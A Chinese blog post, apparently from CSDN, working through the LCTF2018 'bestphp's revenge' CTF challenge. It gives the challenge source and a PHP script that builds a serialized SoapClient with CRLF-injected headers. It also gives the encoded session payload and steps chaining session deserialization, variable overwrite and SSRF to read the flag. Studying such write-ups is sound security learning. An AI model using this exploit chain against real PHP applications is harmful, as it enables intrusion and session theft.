bestphp‘s revenge 1

已于 2023-11-12 17:27:03 修改
阅读量161 收藏
点赞数
文章标签: php servlet 服务器
于 2023-02-20 19:07:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62129839/article/details/129112096
版权

源码:

<?php

highlight_file(__FILE__);

$b = 'implode';

call_user_func($_GET['f'], $_POST); 

session_start();//session 反序列化标志

if (isset($_GET['name'])) {

$_SESSION['name'] = $_GET['name'];

}

var_dump($_SESSION);

$a = array(reset($_SESSION), 'welcome_to_the_lctf2018');

call_user_func($b, $a);

//flag.php

only localhost can get flag!session_start(); echo 'only localhost can get flag!'; $flag = 'LCTF{*************************}'; if($_SERVER["REMOTE_ADDR"]==="127.0.0.1"){ $_SESSION['flag'] = $flag; } only localhost can get flag!

if($_SERVER["REMOTE_ADDR"]==="127.0.0.1"){ $_SESSION['flag'] = $flag; }

这里说明ssrf

$_SESSION[0‘name’] =

seesion序列化储存: $_GET[‘name’];将我们的序列化对象,传入session中,并在前面,加一个“|”符号。此时session会以php_serialize的规则储存:a:1:{s:4:“name”;s:199:"|xxx…"}

call_user_func()函数get $f可控 post 可控 用session_start()函数来修改php解释器

$_SESSION['name'] = $_GET['name'];

将ssrf内容传入给session

php脚本:

<?php

$target ='http://127.0.0.1/flag.php';

$b = new SoapClient(null,array('location'=>$target,

'user_agent' => "npfs\r\nCookie:PHPSESSID=123456\r\n",// r n 也就是空行回车

'uri' => "http://127.0.0.1/"));

$se = serialize($b);

echo "|" . urlencode($se);

?>

传入name

|O%3A10%3A%22SoapClient%22%3A5%3A%7Bs%3A3%3A%22uri%22%3Bs%3A17%3A%22http%3A%2F%2F127.0.0.1%2F%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A15%3A%22_stream_context%22%3Bi%3A0%3Bs%3A11%3A%22_user_agent%22%3Bs%3A31%3A%22npfs%0D%0ACookie%3APHPSESSID%3D123456%0D%0A%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D

从而储存我们的要的seesion

接下来就是 如何触发call函数

我觉得这篇博客很精辟

bestphp's revenge_bestphp's revenge 1-CSDN博客

5. call_user_func($_GET[‘f’], $_POST); 将b变量,用extract函数,进行覆盖。覆盖为call_user_func。

6. session_start(); 此时的序列化引擎为php,此函数会按照php的方法,把我们刚才传入的session,进行反序列化。并储存在session中

7. $a = array(reset($_SESSION), ‘welcome_to_the_lctf2018’); 把我们的session与“welcome_to_the_lctf2018”和并为一个数组

8. call_user_func($b, $a); 因为$b变量已经被我们覆盖成了call_user_func,那么此时的程序,就变成了call_user_func(call_user_func,array($_session,‘welcome_to_the_lctf2018’));

9. $_session这个对象,会去调用“welcome_to_the_lctf2018”这个不存在的方法,于是__call方法被

触发,服务器携带我们设置的cookie,去访问flag.php,然后把flag,储存在此cookie对应的session中。

最后将phpsessid改为我们设置的id即可

陈崇拜者
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
------已搬运-------BUUCTF:LCTFbestphp‘s revenge
Zero_Adam的博客
02-01 516
我弄这个题一整天了,晚上不出意外的话还得看,先这样吧。。 里面还有很多疑问点,希望能有大佬指点 要用到的很多很多的知识点,,, sesion反序列化–>soap(ssrf+crlf)–>call_user_func激活soap类(抄袭的,我哪能总结出来啊,,,) call_user_func函数 这个我自己总结的,看看 自己写的 extract extract()函数,从数组中把变量导入当前页面,相同的变量会被覆盖。 所以下面的b=extract,同时$POST是一个数组,所以符合 reset(
bestphp's revenge
沐目的博客
11-08 2007
1.知识点 1.1 SoapClient(待完善) 这是一个php内置的类,当__call方法被触发后,它可以发送HTTP和HTTPS请求。具体的还不太懂,只知道它可以用来造成ssrf漏洞。 <?php $target = "http://127.0.0.1/flag.php"; $attack = new SoapClient(null,array('location' => $ta...
bestphp‘s revenge
feng的博客
03-06 880
前言 很有意思的一道题目,知识点虽然都是很常见的,但是结合到一起去思考,去解题就是很困难的了。 这道题大致涉及了这些知识点: session反序列化 PHP原生类SoapClient的SSRF。 变量覆盖。 CRLF WP 这题其实也是有提示的,访问一下flag.php,可以提示要127.0.0.1,暗示了SSRF。再加上session,很容易想到session反序列化,利用PHP的原生类实现SSRF。 首先写一下反序列化的构造: <?php $a = new SoapClient(null,
BUU-bestphprevenge
unexpectedthing的博客
02-11 807
文章目录前言WPcall_user_func函数php中session反序列化机制构造SSRF之SoapClient类CRLF Injection漏洞解题步骤总结 前言 这个题主要综合了很多知识点,特别综合 考点: session反序列化 原生类SoapClient的SSRF 变量覆盖 CRLF WP 首页代码 <?php highlight_file(__FILE__); $b = 'implode'; call_user_func($_GET['f'], $_POST); session_st
bestphp‘s revenge/ 安洵杯Babyphp(phpsession题目)
qq_62046696的博客
11-30 1012
改变phpsessionid为我们编写代码的那个值就可以获得flag大概思路是这样,等题目上平台,再复现。
[LCTF]bestphp‘s revenge
qq_45691294的博客
09-25 836
知识点:session反序列化->soap(ssrf+crlf)->call_user_func激活soap类 题目直接提供了index.php和flag.php的源码 //index.php <?php highlight_file(__FILE__); $b = 'implode'; call_user_func($_GET['f'], $_POST); session_start(); if (isset($_GET['name'])) { $_SESSION['name'
bestphp‘s revenge SoapClient php处理器反序列化 call_user_func
scrawman的博客
12-08 615
bestphp’s revenge 这道题的知识点还挺多的 源码文件有两个:index.php和flag.php <?php highlight_file(__FILE__); $b = 'implode'; call_user_func($_GET['f'], $_POST); session_start(); if (isset($_GET['name'])) { $_SESSION['name'] = $_GET['name']; } var_dump($_SESSION); $a =
LCTF2018-bestphp‘s revenge
weixin_43610673的博客
06-19 500
<?php highlight_file(__FILE__); $b = 'implode'; call_user_func($_GET['f'], $_POST); session_start(); if (isset($_GET['name'])) { $_SESSION['name'] = $_GET['name']; } var_dump($_SESSION);//打印出seesion的内容 $a = array(reset($_SESSION), 'welcome_to_the_lc
ctf刷题记录
enhengzZ的博客
04-23 1347
基础认证题 页面中依据提示 可猜测用户为admin 可弱口令尝试(admin)------失败 暴脾气,,,词典爆破! 下载其页面提供的词典 抓包处对上图circle处进行解密 在burp的decode模板中进行查询可知其加密方式为base64 载入词典 此处开始走弯路:1.词典所加载的均为密码,缺少用户名(发现问题后,度娘学习正则表达式,很好,又学了个奇奇怪怪的姿势)2.词典爆破后一直都是401返回,长度均为404,没有出现200返回(原因未明) ----------------------------
SESSION反序列化
qq_53142368的博客
06-07 851
SESSION反序列化 session_start(); echo 'only localhost can get flag!'; $flag = 'LCTF{*************************}'; if($_SERVER["REMOTE_ADDR"]==="127.0.0.1"){ $_SESSION['flag'] = $flag; } only localhost can get flag! 看到这个 首先想到SSRF去访问flag.php,然后获得flag,再
Buuctf之web(五)
qq_50589021的博客
12-14 6505
Greatphp 使用 Error/Exception 内置类绕过哈希比较 可见,需要进入eval()执行代码需要先通过上面的if语句: if( ($this->syc != $this->lover) && (md5($this->syc) === md5($this->lover)) && (sha1($this->syc)=== sha1($this->lover)) ) 这个乍看一眼在ctf的基础题目中非常常见,一般情况下只需要使
渗透测试之地基服务篇:服务攻防之数据库Redis(下)
最新发布
liuhyusb的博客
08-31 71
渗透测试-地基篇该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。请注意本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用KaliLinux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。名言:你对这行的兴趣,决定你在这行的成就!
CTFHUB-SSRF-POST请求
qq_62078839的博客
04-23 1593
打开连接 尝试读取flag.php与index.php flag.php <?php error_reporting(0); if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") { echo "Just View From 127.0.0.1"; return; } $flag=getenv("CTFHUB"); $key = md5($flag); if (isset($_POST["key"]) && $_P...
CTFhub-ssrf-POST请求
qq_51553814的博客
08-11 3824
CTFhub-ssrf-POST请求 解题 进入靶场,首先看到的是一片空白,没有任何返回,甚至看源码里面也没有任何东西 使用dirsearch扫描,扫出了一个文件/index.php 还有一个flag.php,我是在网上看WP才知道有这个文件,看了很多篇WP都没有说这个文件怎么来的,只是直接说发现了这个文件 现在先来看一看这两个文件吧 首先是flag.php文件,我们让url=127.0.0.1/flag.php,通过内网来访问就能直接访问到了,访问后是一个方框 再看源码发现,需要用post传输一个key
mysql 文档 无法连接 无效的设置,mysql说:无法连接:无效的设置。 XAMPP
weixin_39952937的博客
03-17 704
mysql说:无法连接:无效的设置。 XAMPP我更改了根密码进行testing,现在我无法login到XAMPP中的phpMyAdmin页面。 我在 这里寻找帮助, 这里基本上说在XAMPP \ PHPMYADMIN文件夹中改变了config.inc.php文件。/* Authentication type and info */ $cfg['Servers'][$i]['auth_type'...
ctf GetFlag
cs_xiaoqiang的博客
01-18 5966
今天好不容易将这道题做出来了,来与大家分享分享。题目如下:访问连接:   http://106.75.26.211:2222   先查看源码,没有任何发现。但是在页面上发现一个登陆窗口,跳转到登陆窗口。并且发现验证码是纯数字的md5的值取最前面的6位,那么可以自己写一个脚本来跑 有了验证码之后,本来是准备尝试爆破的。可是发现每访问一次验证码都会改变,所以这条路明显行不通。经过多次的尝试之后发现登陆

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值